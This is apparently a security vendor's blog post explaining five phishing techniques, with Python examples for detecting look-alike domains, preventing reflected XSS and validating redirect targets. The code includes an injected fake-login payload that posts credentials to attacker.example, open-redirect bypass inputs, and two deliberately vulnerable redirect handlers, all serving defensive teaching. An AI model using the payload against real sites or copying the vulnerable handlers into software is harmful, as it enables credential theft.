5 Ways Hackers Execute Successful Phishing Campaigns

Phishing is the oldest trick in the cybercriminal playbook, but it is still wildly effective at duping unsuspecting victims. Security teams are constantly under fire to defend against phishing, but the truth of the matter is that most attacks attributed to phishing succeed through human error: an untrained employee clicks a malicious email link, follows a malicious redirect, or is fooled by a near-duplicate website run by attackers.

Attackers use a variety of channels to deliver phishing attacks, including email, instant messaging, text messages, compromised websites, and fake social media pages and personas. All of these rely on social engineering, manipulating the target into acting, rather than on a technical exploit alone. Our new ebook, Gone Phishing: How to Defend Against Persistent Phishing Attempts Targeting Your Organization, goes into detail about how threat actors carry out successful phishing attacks and what security teams can do to prevent them. Keep reading to learn about the five most common phishing techniques cybercriminals use.

1. Link Spoofing or Domain Squatting

Link spoofing makes a malicious URL look legitimate so that the target does not notice the small difference before clicking. The simplest form is a mismatch between the visible link text and the real destination in the href. A related technique is domain squatting (also called typosquatting): the attacker registers a domain that differs from the real one by a transposed, missing or substituted character (a digit one in place of a lowercase L, for instance), or places the trusted brand name in a subdomain of a domain they control. Many of these links can be spotted by trained or savvy users who are accustomed to performing a check-before-click routine. But homograph attacks defeat visual inspection: they use characters from other scripts that look identical to Latin letters, such as a Cyrillic "а" in place of a Latin "a". Such domains are registered in punycode form (labels beginning with xn--), and depending on the browser they may be displayed as the look-alike Unicode name rather than the raw punycode, so the difference is invisible to the human eye.
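A check-before-click routine can be automated. The following is an added example written for this post, not IntSights code: it decodes punycode labels, flags labels that mix scripts, folds a small (constructed) set of confusable characters to their Latin look-alikes, and compares the result against an assumed list of protected domains, catching homographs, typosquats within two edits, and brand-in-subdomain tricks. The protected domain list, the confusables table and the sample links are all constructed for the example, and the "last two labels" rule for the registrable domain is a simplification that real code replaces with the public suffix list.

```python
"""Check-before-click for look-alike domains (added example, not IntSights code)."""
import unicodedata
from urllib.parse import urlsplit

# Domains to protect. Constructed for this example; a deployment loads its own list.
PROTECTED = ["paypal.com", "microsoft.com", "intsights.com"]

# A few Cyrillic and Greek letters that render like Latin ones
# (constructed subset of the Unicode confusables data).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u04cf": "l",
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",
}


def decode_label(label):
    """Turn an xn-- (punycode) label back into Unicode so confusables become visible."""
    if label.startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label
    return label


def host_of(url):
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(decode_label(part) for part in host.split("."))


def registrable(host):
    # Simplification: last two labels. Real code consults the public suffix
    # list so that names such as "bank.co.uk" are handled correctly.
    return ".".join(host.split(".")[-2:])


def skeleton(host):
    """Map confusables to Latin look-alikes; NFKC first folds fullwidth forms to ASCII."""
    host = unicodedata.normalize("NFKC", host)
    return "".join(CONFUSABLES.get(ch, ch) for ch in host)


def mixed_script(label):
    """True when a single label mixes letters from more than one script."""
    scripts = {unicodedata.name(ch, "?").split(" ")[0] for ch in label if ch.isalpha()}
    return len(scripts) > 1


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url):
    """Return (verdict, reason) where verdict is 'ok', 'block', 'warn' or 'unknown'."""
    host = host_of(url)
    for good in PROTECTED:
        if host == good or host.endswith("." + good):
            return "ok", "exact match for " + good
    for label in host.split("."):
        if mixed_script(label):
            return "block", "mixed-script label %r" % label
    reg = registrable(host)
    sk = skeleton(reg)
    for good in PROTECTED:
        if sk == good:
            return "block", "homograph of %s: %r" % (good, reg)
        if host.startswith(good + ".") or ("." + good + ".") in host:
            return "block", "%s used as a subdomain of %s" % (good, reg)
        dist = edit_distance(sk.split(".")[0], good.split(".")[0])
        if 0 < dist <= 2:
            return "warn", "%r is %d edit(s) from %s" % (reg, dist, good)
    return "unknown", "not a protected domain"


if __name__ == "__main__":
    # Constructed sample links: genuine, punycode homograph, all-Cyrillic
    # homograph, typosquat, brand-in-subdomain, and an unrelated site.
    for link in [
        "https://www.paypal.com/signin",
        "https://xn--pypal-4ve.com/login",
        "https://\u0440\u0430\u0443\u0440\u0430\u04cf.com/",
        "https://paypa1.com/",
        "https://paypal.com.secure-login.net/",
        "https://example.org/",
    ]:
        print(link, "->", classify(link))
```

The mixed-script test fires before the skeleton comparison because a label that mixes Latin and Cyrillic letters is suspicious regardless of which brand it imitates; the skeleton comparison then catches whole-script homographs, where every letter is Cyrillic and no mixing occurs.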

2. Website Spoofing

Links are not the only items attackers can spoof. Website spoofing is the creation of a replica of a trusted site with the intention of misleading targeted users into entering their credentials on a phishing page. Typically, such sites copy the legitimate logos, fonts, colors and functionality, making the replica appear as realistic as possible. Scripting in the page (historically Flash, today JavaScript) cannot change the URL shown in the browser's real address bar, but attackers can draw a convincing fake address bar inside the page content (in a pop-up or full-screen view, for example) or simply rely on users never checking it, so the site can appear to carry the legitimate URL even though the user is on a malicious clone. Cross-Site Scripting (XSS) takes this methodology one step further: a reflected XSS bug in the legitimate website lets the attacker send a link that really does point at the trusted domain, so URL checks pass, while the injected markup or script, such as a fake login form or a keystroke logger, quietly harvests credentials and other Personally Identifiable Information (PII) from the genuine page.
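The XSS variant is easiest to see in code. The following added example (written for this post, not IntSights code) renders a constructed search-results page twice, once reflecting the query parameter verbatim and once HTML-escaped, and feeds each result to a small parser that lists every form whose submission would leave the legitimate origin. The origin, page template and attacker payload are all assumptions constructed for the example.

```python
"""Reflected XSS turning a legitimate page into a credential harvester,
beside the escaped version (added example, not IntSights code)."""
import html
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

ORIGIN = "https://bank.example"  # assumed legitimate site (constructed)

# Minimal search-results page; {q} is where the user's query is reflected.
TEMPLATE = ("<html><body><h1>Results for: {q}</h1>"
            "<form action=\"/search\"><input name=\"q\"></form>"
            "</body></html>")


def render_vulnerable(query):
    """The bug: the query parameter is written into the page verbatim."""
    return TEMPLATE.format(q=query)


def render_hardened(query):
    """Escape <, >, & and quotes so markup in the query stays inert text."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


class FormCollector(HTMLParser):
    """Collects the action attribute of every <form> tag in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def foreign_form_actions(page, origin=ORIGIN):
    """Return absolute URLs of forms that would submit to a different origin."""
    parser = FormCollector()
    parser.feed(page)
    home = urlsplit(origin)
    foreign = []
    for action in parser.actions:
        target = urlsplit(urljoin(origin + "/", action))
        if (target.scheme, target.netloc) != (home.scheme, home.netloc):
            foreign.append(target.geturl())
    return foreign


# Constructed payload: closes the heading, injects a login form that posts to
# the attacker, then reopens a heading so the page still renders cleanly.
PAYLOAD = ('</h1><form action="https://attacker.example/collect">'
           'Session expired, please sign in: <input name="user">'
           '<input name="pass" type="password"><button>Sign in</button></form><h1>')

if __name__ == "__main__":
    print("vulnerable:", foreign_form_actions(render_vulnerable(PAYLOAD)))
    print("hardened:  ", foreign_form_actions(render_hardened(PAYLOAD)))
```

The same off-origin form check is useful on its own: run over a fetched copy of a page, it flags both an injected form on a real site and a cloned site whose login form posts back to an operator's collection endpoint.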

3. Malicious Website Redirects

A malicious redirect is a piece of code inserted into a website that sends visitors on to another site, typically an attacker-controlled page that harvests credentials or other personal information. The targeted user willfully visits a site they trust and is then forcibly redirected to the undesired destination. Attackers accomplish this either by compromising the website and inserting their own redirection code, or by abusing an existing open redirect bug, where a parameter in a specially crafted URL (a "return to" or "next" parameter, for example) is passed back to the browser without validation. The second case is especially useful to phishers because the link they send begins with the trusted domain and therefore survives a check-before-click inspection.
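The open redirect bug and its fix, as an added example written for this post rather than IntSights code. It shows two patterns that are commonly found in redirect handlers, one that trusts the parameter outright and one whose prefix check is bypassed by a host such as www.example.com.evil.example, beside a validator that accepts only a path on the site's own origin and rejects absolute, scheme-relative and backslash forms. The site origin and all attacker inputs are constructed for the example.

```python
"""Redirect-target validation: two open-redirect patterns beside a hardened
check (added example, not IntSights code)."""
from urllib.parse import urljoin, urlsplit

SITE = "https://www.example.com"  # assumed legitimate origin (constructed)


def redirect_trusting(next_url):
    """Pattern 1: ?next= is used as-is, so any absolute URL is accepted."""
    return next_url


def redirect_prefix_check(next_url):
    """Pattern 2: a prefix check that looks safe but passes
    https://www.example.com.evil.example/ and https://www.example.com@evil.example/."""
    return next_url if next_url.startswith(SITE) else "/"


def safe_redirect(next_url, default="/"):
    """Accept only a path on our own origin; anything else falls back to default."""
    if not next_url:
        return default
    # Browsers treat a backslash in the authority like a slash, so normalise
    # first: '/\evil.example' must be seen as '//evil.example'.
    candidate = next_url.replace("\\", "/")
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default  # relative, scheme-relative or triple-slash forms
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default  # absolute URL, or anything that parsed as a host
    # Resolve against our origin and confirm the result still lives there.
    resolved = urlsplit(urljoin(SITE + "/", candidate))
    if (resolved.scheme, resolved.netloc) != ("https", "www.example.com"):
        return default
    return resolved.path + ("?" + resolved.query if resolved.query else "")


if __name__ == "__main__":
    # One legitimate value followed by constructed attacker inputs.
    for value in [
        "/account/settings?tab=security",
        "https://evil.example/login",
        "//evil.example/login",
        "/\\evil.example/login",
        "https://www.example.com.evil.example/",
        "https://www.example.com@evil.example/",
        "javascript:alert(document.domain)",
    ]:
        print(repr(value))
        print("  trusting:", redirect_trusting(value))
        print("  prefix:  ", redirect_prefix_check(value))
        print("  safe:    ", safe_redirect(value))
```

Returning only the resolved path (plus query) rather than the raw parameter is deliberate: even when the input passes every check, the handler never echoes attacker-controlled bytes into the Location header unchanged.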

4. Social Media and Social Engineering Attacks

Phishing also takes place across other channels, such as social media, which adds to the complexity of protecting against it. Brand and executive impersonation are common methods cybercriminals use there, oftentimes targeting customers who lack the awareness and security protections that employees have. These attacks are social engineering in its purest form: the victim is persuaded by a trusted-looking identity rather than by any technical trick.

5. Phishing Kits

Attackers offer phishing kits for sale on dark web marketplaces. These are software packages that templatize the entire process of building a phishing site: cloned pages for popular brands together with the code that captures submitted credentials and forwards them to the operator. With these kits, hackers do not need technical skills to run intricate phishing campaigns, so the barrier to entry has been substantially lowered and weaponizing a campaign is streamlined even for novice attackers.

To learn more about how cybercriminals leverage phishing attacks against enterprises, read our ebook.

Subscribe to the blog to stay up to date with all the latest industry news and updates from IntSights.